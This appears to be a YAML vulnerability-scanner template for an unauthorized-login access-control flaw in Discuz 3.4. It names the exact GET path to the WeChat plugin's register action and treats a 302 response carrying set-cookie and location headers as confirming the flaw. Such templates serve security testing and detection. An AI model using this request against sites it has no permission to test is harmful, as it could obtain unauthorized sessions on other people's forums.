product: Discuz
vName: Discuz 3.4越权登录
type: 访问控制
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /plugin.php?id=wechat:wechat&ac=wxregister
    verify:
      path: ''
      logic: and
      check:
        - status: 302
          header:
            value:
              - set-cookie
              - location
            logic: and